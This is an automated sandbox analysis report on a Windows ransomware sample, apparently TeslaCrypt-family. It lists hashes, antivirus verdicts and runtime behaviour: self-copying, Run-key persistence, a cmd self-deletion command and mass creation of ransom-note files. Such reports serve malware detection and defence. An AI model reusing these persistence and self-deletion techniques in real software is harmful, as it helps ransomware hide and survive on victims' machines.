Analysis Date2016-02-16 20:34:44
MD51fce0e0b05bd516c507ee13f5f1b9640
SHA1edac2789d1ebc2b8fc6080baf91296165cc826e2

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.coat md5: 94e2f96f7a025201723af30a54119207 sha1: b83c17595631780eaf366681f8daa3920d5df160 size: 4608
Section.cbbl md5: eb6898a6132b6f9a9bd2278563842fe8 sha1: 6aae3cdfd1c1e88e25a4f8c2844d978b0ff63fef size: 141824
Section.rdata md5: c89051e60a5694ac3b56e4da1c63f37e sha1: 8042c72ca7b34e4512aeae4538ac13f8e2b374cc size: 58880
Section.data md5: 0ef8856b72c3ac39e14c0eafb7beb5a4 sha1: 8d2d7bab25a14b663506b5d0f4890ea1274e2a78 size: 37376
Section.rsrc md5: 6ad86ac67168f67c69398e9b636e04b5 sha1: 6a7ae323c832d1f05b17afe3c435b753a3902436 size: 189440
Timestamp2016-02-08 20:29:28
PackerMicrosoft Visual C++ ?.?
PEhashb1d5f6c5c445aabe54e5385cb49bad5ff5d1671b
IMPhashbd2a8f9ba380f160b10d2209983a6ae7
AVCA (E-Trust Ino)Gen:Variant.Symmi.60982
AVRisingNo Virus
AVMcafeeBackDoor-FDCH!1FCE0E0B05BD
AVAvira (antivir)TR/Crypt.Xpack.445731
AVTwisterNo Virus
AVAd-AwareGen:Variant.Symmi.60982
AVAlwil (avast)Win32:Malware-gen
AVEset (nod32)Win32/Kryptik.ENJD
AVGrisoft (avg)Generic_r.HFT
AVSymantecTrojan.Cryptlock.N!g2
AVFortinetW32/Generic.AC.3397816
AVBitDefenderGen:Variant.Symmi.60982
AVK7Trojan ( 004ddc881 )
AVMicrosoft Security EssentialsRansom:Win32/Tescrypt!rfn
AVMicroWorld (escan)Gen:Variant.Zusy.181890
AVMalwareBytesTrojan.MalPack.PK
AVAuthentiumW32/Agent.XL.gen!Eldorado
AVEmsisoftGen:Variant.Symmi.60982
AVFrisk (f-prot)W32/Agent.XL.gen!Eldorado
AVIkarusNo Virus
AVZillya!No Virus
AVKasperskyTrojan-Ransom.Win32.Bitman.hzn
AVTrend MicroNo Virus
AVVirusBlokAda (vba32)No Virus
AVCAT (quickheal)Ransom.Crowti.WR7
AVBullGuardGen:Variant.Zusy.181890
AVArcabit (arcavir)Gen:Variant.Symmi.60982
AVClamAVNo Virus
AVDr. WebTrojan.Inject1.56622
AVF-SecureGen:Variant.Zusy.181890

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\plgguky.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\plgguky.exe
Creates ProcessC:\WINDOWS\system32\cmd.exe /c DEL C:\EDAC27~1.EXE

Process
↳ C:\WINDOWS\system32\cmd.exe /c DEL C:\EDAC27~1.EXE

Process
↳ C:\Documents and Settings\Administrator\Application Data\plgguky.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dsfgsdf-67897869 ➝
C:\Documents and Settings\Administrator\Application Data\plgguky.exe\\x00
RegistryHKEY_CURRENT_USER\Software\2291D7745DC9014\data ➝
NULL
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\dsfgsdf-67897869 ➝
C:\Documents and Settings\Administrator\Application Data\plgguky.exe\\x00
RegistryHKEY_CURRENT_USER\Software\xxxsys\ID ➝
NULL
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\TypeSupport\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\My Documents\My Pictures\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Cookies\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\IMJP8_1\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\glob.js
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\Search70\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Security\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\My Documents\recover_file_lxfugxgps.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\dd_netfx20UI3716.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Accessibility\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_10.0.30319\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\MMC\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Forms\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\My Documents\My Pictures\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\Certificates\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Cookies\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\Themes\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\All Users\Documents\My Music\My Playlists\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Entertainment\HELP_RECOVER_instructions+lcr.png
Creates FilePIPE\wkssvc
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\udstore.js
Creates FileC:\Documents and Settings\Administrator\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Music\New Stories (Highway Blues).wma
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\PrintHood\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\PrintHood\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Security\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013061320130614\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\NetHood\shared on Samba 3.6.9-151.el6 (192.168.1.1)\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Preferences\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Entertainment\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_10.0.30319\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\IMJP8_1\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Music\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\TypeSupport\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CTLs\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\JavaScripts\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\MetaData\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Security\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\Content\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\Content\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Templates\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013052720130603\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_10.0.30319\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Templates\winword.doc
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\{66520883-AF04-4437-A539-3E2F2944B956}\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\My Documents\My Music\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Accessibility\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Preferences\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\NetHood\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\{66520883-AF04-4437-A539-3E2F2944B956}\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Recent\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Favorites\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\MetaData\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\Install\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Templates\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\Search70\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Recent\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\My Documents\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\brndlog.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Forms\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Favorites\Links\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\SendTo\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Accessibility\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\SendTo\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\TypeSupport\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CTLs\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\manifest.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Collab\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\udlog.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Color\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\glob.settings.js
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Security\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Templates\winword2.doc
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\IMJP8_1\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Cookies\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013061320130614\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\JavaScripts\glob.settings.js
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Music\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Forms\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013052720130603\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Favorites\Links\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Music\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Collab\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\My Documents\My Music\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Security\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Security\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\Content\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\My Documents\My Music\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\SendTo\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\JavaScripts\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\Certificates\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\All Users\Documents\My Music\My Playlists\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\MMC\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Preferences\HELP_RECOVER_instructions+lcr.txt
